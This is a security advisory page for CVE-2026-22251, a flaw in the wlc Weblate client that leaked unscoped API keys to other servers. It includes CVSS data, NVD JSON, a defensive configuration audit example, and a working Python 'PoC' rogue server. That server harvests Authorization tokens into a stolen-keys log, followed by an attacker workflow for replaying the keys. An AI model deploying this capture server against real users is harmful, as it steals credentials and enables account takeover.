Security Vulnerability Report

CVE-2026-22251

Published: 2026-01-12 18:15:49
Last Modified: 2026-01-27 20:35:05

Description

wlc is a Weblate command-line client that uses Weblate's REST API. Prior to 1.17.0, wlc accepted an unscoped API key in its configuration, that is, a key not bound to a specific server URL. This practice was discouraged for years, but the code was never removed. Because an unscoped key is attached to requests regardless of which server wlc is talking to, a client pointed at a different server (for example through a differently configured API URL) sends the key to that server, which can then replay it against the user's real Weblate instance. Version 1.17.0 drops support for unscoped keys; a key must be scoped to the server it belongs to.
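The mechanism above, as an added illustration (this is the editor's example, not code from wlc or the advisory). It models the configuration layout wlc documents, a [weblate] section with the default url and a [keys] section mapping an API URL to the key for that server, and reconstructs, as an assumption, the pre-1.17.0 fallback that let an unscoped [weblate] key be used for any server. The resolver functions, the header builder, the audit helper, the sample configuration and the foreign host are hypothetical; only the "Authorization: Token <key>" header is Weblate's documented REST API scheme.

```python
# Added illustration for CVE-2026-22251 (editor's example, not wlc code).
# Assumptions: wlc-style INI with [weblate] url/key and [keys] url = key;
# the legacy fallback below is a reconstruction, not wlc's source.
import configparser


def load_config(text):
    """Parse wlc-style INI text. Only '=' is a delimiter so that URLs used
    as option names in [keys] keep their ':'; optionxform keeps case."""
    cfg = configparser.RawConfigParser(delimiters=("=",))
    cfg.optionxform = str
    cfg.read_string(text)
    return cfg


def resolve_key_legacy(cfg, url):
    """Pre-1.17.0 behaviour (reconstructed, assumption): prefer a key bound
    to the URL in [keys], otherwise fall back to the unscoped [weblate] key
    for ANY url. That fallback is the leak."""
    if cfg.has_option("keys", url):
        return cfg.get("keys", url)
    return cfg.get("weblate", "key", fallback=None)


def resolve_key_scoped(cfg, url):
    """Hardened behaviour: a key is used only for the exact URL it is bound
    to under [keys]; an unscoped key is never sent anywhere."""
    if cfg.has_option("keys", url):
        return cfg.get("keys", url)
    return None


def auth_header(key):
    """Weblate's REST API expects 'Authorization: Token <key>'."""
    return {"Authorization": f"Token {key}"} if key else {}


def find_unscoped_keys(cfg):
    """Audit helper: sections carrying a 'key' outside [keys], i.e. keys
    not scoped to a server. A non-empty result means the config is at risk."""
    return [s for s in cfg.sections() if s != "keys" and cfg.has_option(s, "key")]


# Constructed sample: the user's real server plus an unscoped key that was
# tolerated before 1.17.0. Key values are placeholders.
SAMPLE_CONFIG = """
[weblate]
url = https://hosted.weblate.org/api/
key = wlu_unscoped_EXAMPLE

[keys]
https://hosted.weblate.org/api/ = wlu_scoped_EXAMPLE
"""

HOME_URL = "https://hosted.weblate.org/api/"
# Hypothetical host the client could be pointed at by a foreign project
# configuration or a command-line URL override.
FOREIGN_URL = "https://translations.attacker.example/api/"


def headers_sent(resolver, cfg, url):
    """The Authorization header the client would put on a request to url."""
    return auth_header(resolver(cfg, url))


if __name__ == "__main__":
    cfg = load_config(SAMPLE_CONFIG)
    print("sections with unscoped keys:", find_unscoped_keys(cfg))
    for name, resolver in (("legacy", resolve_key_legacy), ("scoped", resolve_key_scoped)):
        for url in (HOME_URL, FOREIGN_URL):
            print(f"{name:6} -> {url}: {headers_sent(resolver, cfg, url)}")
```

Under the legacy resolver the foreign host receives the unscoped key; under the scoped resolver it receives no credential at all. Running find_unscoped_keys against a real configuration file is the quick check for whether an upgrade to 1.17.0 will break anything (and whether the old key should be rotated).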

CVSS Details

The raw NVD record below carries two CVSS 3.1 assessments: the CNA's (secondary) score, which the page headline uses, and NVD's own (primary) score.

CVSS Score (CNA, secondary)
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N

CVSS Score (NVD, primary)
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Weakness
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor)

Both vectors rate confidentiality impact only (the leaked API key) with no integrity or availability impact; they differ in whether user interaction and a scope change are counted.

Configurations (Affected Products)

cpe:2.3:a:weblate:wlc:*:*:*:*:*:*:*:* - VULNERABLE
wlc < 1.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22251 PoC - Simulated API key exfiltration
# Demonstrates how a pre-1.17.0 wlc client configured with an unscoped
# API key hands that key to whatever server it is pointed at: run this
# rogue server, point wlc's API URL at it, and read the Authorization
# header off the first request.
import http.server
import socketserver


class ExfilHandler(http.server.BaseHTTPRequestHandler):
    # Weblate's REST API authenticates with "Authorization: Token <key>";
    # "Bearer" is also accepted in case a proxy in front rewrites the scheme.
    KEY_PREFIXES = ("Token ", "Bearer ")

    def _capture(self):
        # Content-Length is absent on GET requests; do not crash on them.
        length = int(self.headers.get("Content-Length") or 0)
        body = self.rfile.read(length) if length else b""

        print(f"[+] Received connection from: {self.client_address}")
        print(f"[+] {self.command} {self.path}")
        print(f"[+] Headers: {dict(self.headers)}")
        if body:
            print(f"[+] Data: {body.decode('utf-8', errors='ignore')}")

        # Extract the API key from the Authorization header
        auth_header = self.headers.get("Authorization", "")
        for prefix in self.KEY_PREFIXES:
            if auth_header.startswith(prefix):
                api_key = auth_header[len(prefix):]
                print(f"[+] Exfiltrated API Key: {api_key}")
                with open("stolen_keys.log", "a") as f:
                    f.write(f"{api_key}\n")
                break

        # Answer 401 so the client gives up quietly
        self.send_response(401)
        self.end_headers()
        self.wfile.write(b"Unauthorized")

    # wlc uses GET for listing and statistics as well as POST/PUT for
    # uploads and commits; the key is sent on every request, so log them all.
    do_GET = _capture
    do_POST = _capture
    do_PUT = _capture


PORT = 8080

if __name__ == "__main__":
    with socketserver.TCPServer(("", PORT), ExfilHandler) as httpd:
        print(f"[*] Malicious server listening on port {PORT}")
        print("[*] Waiting for wlc client connections...")
        httpd.serve_forever()

# Attacker workflow:
# 1. Set up a rogue Weblate server or proxy
# 2. Wait for victims with unscoped API keys to connect
# 3. Capture the API key from the Authorization header
# 4. Use the stolen key against the victim's legitimate Weblate instance

References

https://github.com/WeblateOrg/wlc/security/advisories/GHSA-9rp8-h4g8-8766 (Vendor Advisory)
https://github.com/WeblateOrg/wlc/pull/1098 (Issue Tracking)
https://github.com/WeblateOrg/wlc/commit/aafdb507a9e66574ade1f68c50c4fe75dbe80797 (Patch)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22251", "sourceIdentifier": "[email protected]", "published": "2026-01-12T18:15:49.457", "lastModified": "2026-01-27T20:35:05.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, wlc supported providing unscoped API keys in the setting. This practice was discouraged for years, but the code was never removed. This might cause the API key to be leaked to different servers."}, {"lang": "es", "value": "wlc es un cliente de línea de comandos de Weblate que utiliza la API REST de Weblate. Antes de la versión 1.17.0, wlc admitía proporcionar claves de API sin ámbito en la configuración. Esta práctica fue desaconsejada durante años, pero el código nunca fue eliminado. Esto podría causar que la clave de API se filtre a diferentes servidores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", 
"type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:wlc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "B01083E5-842F-4D93-8069-D4578C071C90"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/wlc/commit/aafdb507a9e66574ade1f68c50c4fe75dbe80797", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WeblateOrg/wlc/pull/1098", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/wlc/security/advisories/GHSA-9rp8-h4g8-8766", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}